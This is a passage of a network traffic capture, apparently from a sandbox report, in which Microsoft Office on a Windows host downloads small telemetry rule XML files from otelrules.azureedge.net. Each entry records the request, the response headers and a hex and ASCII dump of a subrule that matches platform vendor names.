2024-12-08 18:53:23 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:25 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:25 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185325Z-r1cf579d778dfdgnhC1EWRd3w000000005wg0000000083xs x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:25 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:25 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:25 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: eee9af6d-a01e-001e-1905-4849ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185325Z-r1cf579d778w59f9hC1EWRze6w00000006bg000000006v07 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:25 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:25 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:25 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 7b814a2b-101e-0017-4003-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185325Z-r1cf579d778xq4f9hC1EWRx41g00000005z0000000005g1h x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:25 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:25 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:25 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:25 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185325Z-r1cf579d778z4wflhC1EWRa3h00000000670000000004g53 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:25 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.4	49815	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:25 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:26 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:25 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: a7f5343d-701e-001e-5304-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185325Z-r1cf579d778dfdgnhC1EWRd3w000000005x0000000007p2u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:26 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.4	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:27 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:27 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:27 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 7407b41f-701e-0098-7b04-48395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185327Z-r1cf579d778t6txphC1EWRsd4400000006p0000000003y25 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.4	49817	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:27 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 49c2372f-d01e-0065-7b09-48b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185327Z-r1cf579d778qlpkrhC1EWRpfc800000006x0000000001v5t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.4	49818	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:27 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:28 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 704c87bc-501e-00a0-2501-489d9f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185328Z-r1cf579d778dfdgnhC1EWRd3w00000000610000000001kfn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:28 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.4	49819	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:27 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: a75b6259-601e-0084-3701-486b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185328Z-r1cf579d778xr2r4hC1EWRqvfs0000000670000000003c06 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.4	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:27 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:28 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 90ee9adf-001e-0014-3106-485151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185328Z-r1cf579d778lntp7hC1EWR9gg400000005h0000000007zdw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49821	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:29 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:29 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 1f654f05-501e-008f-5009-489054000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185329Z-r1cf579d778d5zkmhC1EWRk6h800000006r00000000008th x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:30 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49822	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:30 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
